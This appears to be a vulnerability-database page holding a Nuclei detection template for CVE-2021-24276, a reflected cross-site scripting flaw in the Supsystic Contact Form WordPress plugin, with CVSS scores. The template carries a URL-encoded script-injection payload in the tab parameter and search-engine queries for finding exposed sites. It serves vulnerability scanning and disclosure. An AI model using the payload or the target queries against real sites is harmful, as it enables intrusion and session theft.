Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-24276
HistorySep 28, 2021 - 5:07 p.m.

WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting

2021-09-2817:07:40
ProjectDiscovery
github.com
3
wordpress
wp-plugin
wpscan
packetstorm
supsystic
cve2021
contact form
cross-site scripting
vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

64.8%

WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.

id: CVE-2021-24276

info:
  name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
    - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24276
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24276
    cwe-id: CWE-79
    epss-score: 0.00231
    epss-percentile: 0.61154
    cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: supsystic
    product: contact_form
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/contact-form-plugin/
    fofa-query: body=/wp-content/plugins/contact-form-plugin/
    publicwww-query: /wp-content/plugins/contact-form-plugin/
  tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402207c974866130fde17ddd398b2b05cabc0d5cc7b88d033ec49799978b0f36546bb02206398d07cab401ea1a276f5861fe5003399071e0b3133dde3e3d1536842cf3c2a:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

64.8%